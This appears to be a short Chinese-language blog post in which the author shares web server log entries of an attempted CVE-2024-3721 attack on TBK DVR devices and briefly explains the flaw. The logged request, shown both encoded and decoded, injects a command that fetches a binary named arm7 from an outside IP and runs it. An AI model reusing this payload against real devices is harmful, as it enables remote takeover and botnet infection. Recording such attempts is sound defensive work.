91.224.92.10 - - [20/Feb/2025:16:17:56 +0800] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F45.125.66.114%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1" 404 534 "-" "Mozila/5.0"
91.224.92.10 - - [20/Feb/2025:16:22:58 +0800] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F45.125.66.114%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1" 404 534 "-" "Mozila/5.0"
device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /tmp;rm arm7; wget http://45.125.66.114/arm7; chmod 777 *; ./arm7 tbk
欲從立陶宛 45.125.66.114 下載 arm7, 看起來又是殭屍病毒, 想手動下載回來看看但因為防毒軟體擋下來就懶得再去抓檔了
這是一個 CVE-2024-3721漏洞攻擊, 存在於 TBK DVR-4104和 DVR-4216設備中的漏洞, 影響檔案 /device.rsp?opt=sys&cmd= S_O_S_T_R_E_A_MAX的一些未知處理, 對參數 mdb/mdc 的操作會導致作業系統指令注入, 攻擊可能由遠端發動
沒有留言:
張貼留言